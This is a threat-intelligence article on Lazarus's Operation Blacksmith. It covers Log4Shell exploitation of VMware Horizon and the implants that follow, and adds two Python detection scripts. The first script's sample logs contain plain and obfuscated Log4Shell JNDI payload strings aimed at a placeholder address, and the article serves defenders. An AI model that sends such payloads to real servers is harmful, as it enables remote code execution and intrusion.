Lazarus executes Operation Blacksmith via the Log4j flaw

March 15, 2024
Operation Blacksmith Log4j CVE VMWareHorizon

A new global campaign, dubbed Operation Blacksmith, by the North Korea-linked threat group Lazarus targets organisations across several industries.

The newly discovered operation exploits the Log4j vulnerability known as Log4Shell (CVE-2021-44228), disclosed in December 2021, showing that the group still gets mileage out of a years-old flaw wherever it remains unpatched. The campaign, which reportedly began in March 2023, has targeted manufacturing, agriculture and physical security organisations.


Operation Blacksmith begins by attacking public-facing VMware Horizon servers.


The initial stage of Operation Blacksmith is the exploitation of the Log4j flaw on internet-facing VMware Horizon servers that still run a vulnerable Log4j build. That breach gives Lazarus a foothold on the targeted network from which the rest of the intrusion proceeds.
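As an added example, not code from the original article or from the threat research it summarises, the following Python detector shows what a request exploiting CVE-2021-44228 against a Log4j-backed service such as VMware Horizon looks like in an access log, and how to catch it. It percent-decodes each line, resolves the nested `${lower:...}` and `${...:-x}` lookups attackers use to hide the string `jndi`, and then flags any resolved JNDI lookup. The log lines are constructed for this example and the addresses come from documentation ranges; they are not campaign indicators.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote

# Constructed web-server access-log lines for this example (not real campaign data).
# Lines 2-5 carry JNDI lookup strings in the User-Agent or query string, in plain and
# obfuscated forms; lines 1 and 6 are benign.
SAMPLE_LOGS = [
    '10.0.0.5 - - [12/Mar/2023:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Mar/2023:10:01:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '203.0.113.7 - - [12/Mar/2023:10:01:11 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}${lower:n}di:${lower:l}dap://203.0.113.7:1389/a}"',
    '203.0.113.7 - - [12/Mar/2023:10:01:12 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.7:1099/x}"',
    '203.0.113.7 - - [12/Mar/2023:10:01:15 +0000] "GET /portal/?u=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.7%3A1389%2Fb%7D HTTP/1.1" 200 512 "-" "curl/7.88"',
    '10.0.0.9 - - [12/Mar/2023:10:02:00 +0000] "GET /broker/xml HTTP/1.1" 200 88 "-" "VMware-Horizon-Client"',
]

# Innermost ${...} lookup: its body contains no further '$', '{' or '}'.
_INNER = re.compile(r'\$\{([^${}]*)\}')
# A resolved JNDI lookup with one of the protocol handlers Log4j 2.x dispatches on.
_JNDI = re.compile(r'\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:[^}]*\}', re.IGNORECASE)


def _resolve_one(body: str) -> str:
    """Evaluate one lookup the way Log4j's string substitution would for the
    constructs attackers use to hide the word 'jndi'."""
    if ':-' in body:                       # ${any:missing:-X} -> X   (also ${::-X})
        return body.split(':-', 1)[1]
    kind, sep, arg = body.partition(':')
    if sep and kind.strip().lower() == 'lower':
        return arg.lower()
    if sep and kind.strip().lower() == 'upper':
        return arg.upper()
    return '${' + body + '}'               # jndi, env, sys, date, ...: leave as-is


def normalize(s: str, max_rounds: int = 16) -> str:
    """Percent-decode, then resolve nested lookups innermost-first until nothing changes."""
    s = unquote(s)
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: _resolve_one(m.group(1)), s)
        if new == s:
            break
        s = new
    return s


def find_log4shell_hits(lines: List[str]) -> List[Tuple[int, str, str, str]]:
    """Return (line_no, client_ip, protocol, resolved_payload) for every line that
    contains a JNDI lookup after de-obfuscation."""
    hits = []
    for no, line in enumerate(lines, 1):
        norm = normalize(line)
        m = _JNDI.search(norm)
        if m:
            client_ip = line.split(' ', 1)[0]   # first field of the combined log format
            hits.append((no, client_ip, m.group(1).lower(), m.group(0)))
    return hits


if __name__ == '__main__':
    for no, ip, proto, payload in find_log4shell_hits(SAMPLE_LOGS):
        print(f'line {no}: {ip} -> {proto} lookup {payload}')
```

Matching on the literal string `${jndi:` alone misses the obfuscated forms on lines 3 and 4, which is why the resolver runs before the signature; the same normalisation is worth applying to any header a Java service logs, not just the User-Agent.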

Next, the attackers deploy HazyLoad, a custom proxy tool, to maintain access to the compromised host. HazyLoad is fetched by a simple downloader called BottomLoader, which uses PowerShell to retrieve and execute a payload from a hard-coded URL; layering a downloader beneath the proxy is part of the group's approach to ensuring prolonged access to its targets.

Separate research also found the group occasionally abandoning its established communication channel in favour of a new remote IP address. Switching infrastructure mid-intrusion makes detection and blocking harder for defenders, because indicators collected early in an incident stop being reliable.

Once inside, the operators create a new user account and grant it administrative privileges, giving themselves admin-level access that no longer depends on the initial exploit. In the final stage, Lazarus deploys NineRAT, a remote access trojan written in D (DLang) that collects system information and harvests data from the host.
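The account-creation step above leaves a clear trace in the Windows Security log. As an added example, not from the article or the threat report it summarises, the following Python pairs event 4720 (user account created) with a subsequent 4732 (member added to a security-enabled local group) for the local Administrators group on the same host within a short window, which is the sequence a `net user /add` followed by `net localgroup administrators /add` produces. The event records are constructed and simplified; the host and account names are assumptions.

```python
from datetime import datetime, timedelta
from typing import Dict, List

# Well-known SIDs of the local Administrators and Users groups.
ADMINISTRATORS_SID = "S-1-5-32-544"
USERS_SID = "S-1-5-32-545"

# Constructed, simplified Windows Security event records for this example (not real
# telemetry). 4720 = user account created, 4732 = member added to a security-enabled
# local group. 'subject' is the account that performed the action.
SAMPLE_EVENTS = [
    {"ts": "2023-03-12T10:05:00", "id": 4720, "host": "HORIZON01", "subject": "HORIZON01$", "target": "svc_backup"},
    {"ts": "2023-03-12T10:05:03", "id": 4732, "host": "HORIZON01", "subject": "HORIZON01$", "member": "svc_backup", "group_sid": ADMINISTRATORS_SID},
    {"ts": "2023-03-12T11:00:00", "id": 4720, "host": "DC01", "subject": "jdoe", "target": "new_hire"},
    {"ts": "2023-03-12T11:00:30", "id": 4732, "host": "DC01", "subject": "jdoe", "member": "new_hire", "group_sid": USERS_SID},
    {"ts": "2023-03-12T12:00:00", "id": 4720, "host": "FILE01", "subject": "ops_admin", "target": "svc_scan"},
    {"ts": "2023-03-14T12:00:00", "id": 4732, "host": "FILE01", "subject": "ops_admin", "member": "svc_scan", "group_sid": ADMINISTRATORS_SID},
]


def _ts(s: str) -> datetime:
    return datetime.fromisoformat(s)


def find_new_local_admins(events: List[Dict], window: timedelta = timedelta(minutes=10)) -> List[Dict]:
    """Alert when an account is created (4720) and then added to local Administrators
    (4732 with the Administrators SID) on the same host within `window`."""
    created: Dict[tuple, Dict] = {}     # (host, account) -> the 4720 event
    alerts: List[Dict] = []
    for ev in sorted(events, key=lambda e: _ts(e["ts"])):
        if ev["id"] == 4720:
            created[(ev["host"], ev["target"].lower())] = ev
        elif ev["id"] == 4732 and ev.get("group_sid") == ADMINISTRATORS_SID:
            c = created.get((ev["host"], ev["member"].lower()))
            if c is not None:
                gap = _ts(ev["ts"]) - _ts(c["ts"])
                if timedelta(0) <= gap <= window:
                    alerts.append({
                        "host": ev["host"],
                        "account": ev["member"],
                        "created_by": c["subject"],
                        "elevated_by": ev["subject"],
                        "seconds_between": int(gap.total_seconds()),
                    })
    return alerts


if __name__ == "__main__":
    for a in find_new_local_admins(SAMPLE_EVENTS):
        print(f'{a["host"]}: {a["account"]} created by {a["created_by"]} and made local admin '
              f'{a["seconds_between"]}s later by {a["elevated_by"]}')
```

The window keeps routine provisioning (an account created in the morning and elevated days later by an administrator) out of the alert; a machine account such as `HORIZON01$` as the subject of both events is itself worth a second look, since it means a process running as the server's service identity created the user.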

NineRAT uses Telegram's bot API as its C2 channel: it receives remotely issued commands through it, sends back system information, and can uninstall or upgrade itself on request. Because the traffic goes to legitimate Telegram infrastructure over TLS, it blends in with ordinary use and is unlikely to be stopped by reputation-based blocking alone.

Lazarus's habit of refreshing its malware arsenal also shows in Operation Blacksmith's use of DLRAT, another D-based implant. DLRAT serves as both a downloader and a RAT: it retrieves commands from the C2, executes them on the infected system and can deliver additional payloads.

These methods show the group's determination to stay ahead of defences by continuously evolving its TTPs. Lazarus's persistent and varied activity underlines two things: that Log4Shell remains exploitable on unpatched internet-facing systems years after disclosure, and that proactive engagement with threat intelligence-sharing platforms helps defenders fortify their environments against emerging threats.

Organisations should ensure that internet-facing software such as VMware Horizon is patched against CVE-2021-44228, monitor for the post-exploitation steps described above (new local administrator accounts, unexpected proxy binaries, Telegram API traffic from servers), and deploy security controls that can keep pace with adversaries who continuously refine their tactics.
